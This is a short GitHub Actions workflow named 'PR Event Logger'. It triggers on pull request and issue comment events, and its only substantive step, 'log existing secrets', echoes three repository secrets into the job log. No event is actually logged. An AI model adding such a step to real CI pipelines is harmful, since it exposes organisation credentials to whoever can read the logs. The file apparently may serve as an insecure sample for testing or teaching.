name: PR Event Logger

on:
  pull_request:
    types: [opened, reopened, ready_for_review, review_requested]
  issue_comment:
    types: [created, edited]

jobs:
  log-event:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Set up Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.9'

      - name: log existing secrets
        env: 
          API_TOKEN: ${{ secrets.API_TOKEN }}
          WEBHOOK_SECRET: ${{ secrets.WEBHOOK_SECRET }}
          ORG_TOKEN: ${{ secrets.ORG_TOKEN }}
        run: echo $API_TOKEN $WEBHOOK_SECRET $ORG_TOKEN
